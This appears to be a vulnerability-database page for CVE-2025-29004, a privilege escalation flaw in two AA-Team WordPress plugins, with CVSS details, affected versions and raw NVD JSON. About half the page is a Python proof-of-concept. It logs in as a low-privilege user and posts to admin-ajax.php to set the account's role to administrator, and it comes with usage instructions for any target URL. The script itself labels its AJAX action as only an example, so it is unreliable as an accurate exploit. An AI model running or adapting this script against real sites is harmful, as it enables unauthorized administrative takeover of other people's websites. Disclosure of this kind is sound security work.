Security Vulnerability Report
中文
CVE-2025-29004 CVSS 8.8 HIGH

CVE-2025-29004

Published: 2026-01-06 21:15:42
Last Modified: 2026-04-28 19:30:14
Source: [email protected]

Description

Incorrect Privilege Assignment vulnerability in AA-Team Premium Age Verification / Restriction for WordPress, AA-Team Responsive Coming Soon Landing Page / Holding Page for WordPress allows Privilege Escalation.This issue affects Premium Age Verification / Restriction for WordPress: from n/a through 3.0.2; Responsive Coming Soon Landing Page / Holding Page for WordPress: from n/a through 3.0.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

AA-Team Premium Age Verification / Restriction for WordPress < 3.0.3
AA-Team Responsive Coming Soon Landing Page / Holding Page for WordPress < 3.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys import re # CVE-2025-29004 PoC - WordPress Plugin Privilege Escalation # Target: AA-Team Premium Age Verification / Responsive Coming Soon plugins def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-29004 """ # Add WordPress path if not present if not target_url.endswith('/'): target_url += '/' # Check for vulnerable plugin paths vulnerable_paths = [ 'wp-content/plugins/premium-age-verification-restriction/', 'wp-content/plugins/responsive-coming-soon-landing-page/', 'wp-admin/admin-ajax.php' ] for path in vulnerable_paths: url = target_url + path try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: print(f"[+] Found potential vulnerable endpoint: {url}") except requests.RequestException as e: print(f"[-] Error accessing {url}: {e}") def exploit_privilege_escalation(target_url, username, password): """ Exploit CVE-2025-29004 to escalate privileges """ # Login to WordPress login_url = target_url + '/wp-login.php' session = requests.Session() login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target_url + '/wp-admin/', 'testcookie': '1' } try: login_resp = session.post(login_url, data=login_data, timeout=10) if 'wordpress_logged_in' in str(session.cookies): print("[+] Successfully authenticated as low-privilege user") # Attempt privilege escalation via AJAX endpoint ajax_url = target_url + '/wp-admin/admin-ajax.php' # Payload for privilege escalation (plugin-specific) # This targets the incorrect privilege assignment vulnerability exploit_data = { 'action': 'age_restriction_update_user_role', # Example action 'user_id': 'current', # Target current user 'new_role': 'administrator' } exploit_resp = session.post(ajax_url, data=exploit_data, timeout=10) if exploit_resp.status_code == 200: # Verify privilege escalation profile_url = target_url + '/wp-admin/profile.php' profile_resp = session.get(profile_url, timeout=10) if 'administrator' in profile_resp.text.lower() or 'editor' in profile_resp.text.lower(): print("[+] Privilege escalation successful!") print("[+] User now has elevated privileges") return True else: print("[-] Authentication failed") return False except requests.RequestException as e: print(f"[-] Exploitation error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2025-29004.py <target_url> <username> <password>") print("Example: python cve-2025-29004.py http://target.com user pass") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] print(f"[*] Checking target: {target}") check_vulnerability(target) print(f"[*] Attempting exploitation...") exploit_privilege_escalation(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-29004", "sourceIdentifier": "[email protected]", "published": "2026-01-06T21:15:42.240", "lastModified": "2026-04-28T19:30:13.560", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect Privilege Assignment vulnerability in AA-Team Premium Age Verification / Restriction for WordPress, AA-Team Responsive Coming Soon Landing Page / Holding Page for WordPress allows Privilege Escalation.This issue affects Premium Age Verification / Restriction for WordPress: from n/a through 3.0.2; Responsive Coming Soon Landing Page / Holding Page for WordPress: from n/a through 3.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/age-restriction/vulnerability/wordpress-premium-age-verification-restriction-for-wordpress-plugin-3-0-2-privilege-escalation-vulnerability?_s_id=cve", "source": "[email protected]"}, {"url": "https://patchstack.com/database/wordpress/plugin/wordpress-flat-countdown/vulnerability/wordpress-responsive-coming-soon-landing-page-holding-page-for-wordpress-3-0-privilege-escalation-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.